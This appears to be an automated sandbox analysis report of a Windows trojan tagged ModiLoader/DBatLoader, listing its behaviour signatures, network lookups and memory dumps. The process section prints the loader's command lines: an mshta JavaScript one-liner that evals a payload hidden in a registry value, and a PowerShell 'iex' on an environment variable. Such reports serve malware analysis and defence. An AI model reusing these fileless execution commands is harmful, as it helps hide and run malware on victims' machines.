SHA512 746ad85e821ccdeddee724cb0d9aae1abe581794f4911b78f1449215f3adb4dbccb06dfb85317fba40935fa7b54ace913c97c1888265c1da0e07a26fbe04d874

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 14:40

Reported

2024-05-25 15:13

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1392 wrote to memory of 1532 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1392 wrote to memory of 1532 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1392 wrote to memory of 1532 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:lwg0u1="oh";qz2=new%20ActiveXObject("WScript.Shell");ESa17p="0QN8JTtY";WeS71m=qz2.RegRead("HKCU\\software\\mENrsLhvi\\7tPJpgkf");Utwl15="VyGpFB";eval(WeS71m);mPXr1dDj="OVZ7Vp";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cmfw

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 131.109.69.13.in-addr.arpa udp

Files

memory/700-1-0x0000000000457000-0x0000000000459000-memory.dmp

memory/700-0-0x0000000000400000-0x0000000000460710-memory.dmp

memory/700-2-0x0000000002380000-0x000000000245C000-memory.dmp

memory/700-6-0x0000000002380000-0x000000000245C000-memory.dmp

memory/700-3-0x0000000002380000-0x000000000245C000-memory.dmp

memory/700-5-0x0000000002380000-0x000000000245C000-memory.dmp

memory/700-7-0x0000000000400000-0x0000000000460710-memory.dmp

memory/700-4-0x0000000002380000-0x000000000245C000-memory.dmp

memory/700-8-0x0000000002380000-0x000000000245C000-memory.dmp

memory/700-9-0x0000000002380000-0x000000000245C000-memory.dmp

memory/1532-11-0x0000000002D50000-0x0000000002D86000-memory.dmp

memory/1532-12-0x0000000005790000-0x0000000005DB8000-memory.dmp

memory/1532-13-0x0000000005680000-0x00000000056A2000-memory.dmp

memory/1532-14-0x0000000005E70000-0x0000000005ED6000-memory.dmp

memory/1532-15-0x0000000005EE0000-0x0000000005F46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnqvhsqt.bds.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1532-25-0x0000000005F50000-0x00000000062A4000-memory.dmp

memory/1532-26-0x0000000006450000-0x000000000646E000-memory.dmp

memory/1532-27-0x0000000006480000-0x00000000064CC000-memory.dmp

memory/1532-28-0x0000000007CB0000-0x000000000832A000-memory.dmp

memory/1532-29-0x0000000006960000-0x000000000697A000-memory.dmp